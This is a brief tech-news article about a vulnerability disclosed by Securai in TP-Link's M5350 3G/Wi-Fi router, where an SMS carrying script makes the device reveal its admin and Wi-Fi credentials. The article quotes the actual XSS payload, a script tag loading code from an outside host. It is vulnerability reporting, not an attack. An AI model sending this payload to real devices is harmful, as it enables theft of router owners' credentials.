TP-Link 3G/Wi-Fi modem spills credentials to an evil text message

So why can it read scripts sent by SMS anyhow?

Facepalm

TP-Link's M5350 3G/Wi-Fi router, has the kind of howling bug that gives infosec pros nightmares.

In what looks like a feature created for developers' convenience, but left behind when it should have been deleted, the device's admin credentials can be retrieved by text message.

The discoverer of the bug, a German company called Securai, told Heise.de the issue as a cross-site scripting (XSS) bug triggered by an SMS containing the following attack script:

<script src=//n.ms/a.js></script>

The device replies with admin username, admin password, its SSID, and its login password.

In the Heise.de piece, Securai's Jan Hörsch said he discovered the bug by analysing the modem's firmware.

It's unlikely that the vulnerability has been patched, since according to TP-Link's current firmware download page for the M5350, the most-current version is M5350_V2_140115, released in January 2015.

Heise notes that Hörsch has also been having fun with the other usual Internet-of-Things targets – a Panasonic BM ET200 retina scanner whose web interface could bypass security by sending it crafted JavaScript, and a Startech modem with a hard-coded telnet password.

The bugs were revealed at last week's Kaspersky Security Analyst Summit. ®


Biting the hand that feeds IT © 1998–2017